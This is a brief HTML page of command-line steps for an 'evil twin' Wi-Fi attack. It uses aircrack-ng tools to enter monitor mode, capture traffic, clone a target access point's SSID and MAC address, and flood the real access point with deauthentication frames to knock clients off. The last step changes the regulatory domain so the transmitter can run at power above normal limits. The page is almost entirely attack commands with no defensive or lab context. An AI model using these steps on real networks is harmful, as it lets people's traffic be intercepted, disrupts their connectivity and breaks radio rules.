<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Create Rogue Access Point</title>
</head><body>Check wifi status<br/>
<br/>
iwconfig<br/>
<br/>
Start Wireless Interface into Monitor Mode<br/>
---------<br/>
<br/>
airmon-ng start &lt;wireless interface probably wlan0&gt;<br/>
<br/>
Start Traffic Capture<br/>
---------<br/>
<br/>
airodump-ng &lt;wireless interface that is in monitor mode probably wlan0mon&gt;<br/>
<br/>
Create a New AP with same SSID and MAC<br/>
---------<br/>
<br/>
airbase-ng -a &lt;mac address of access point&gt; -essid &lt;name of access point you want to clone&gt; -c &lt;channel&gt; &lt;wireless interface&gt;<br/>
<br/>
Deauthing Access Point<br/>
---------<br/>
<br/>
aireplay-ng --deauth 0 -a &lt;Mac Address of Acces Point<br/>
<br/>
Turn Up The power on our evil access point (we need to be more powerful than the access point we'd like to clone)<br/>
---------<br/>
<br/>
iw reg set BO<br/>
iwconfig &lt;wireless interface&gt; txpower 30</body></html>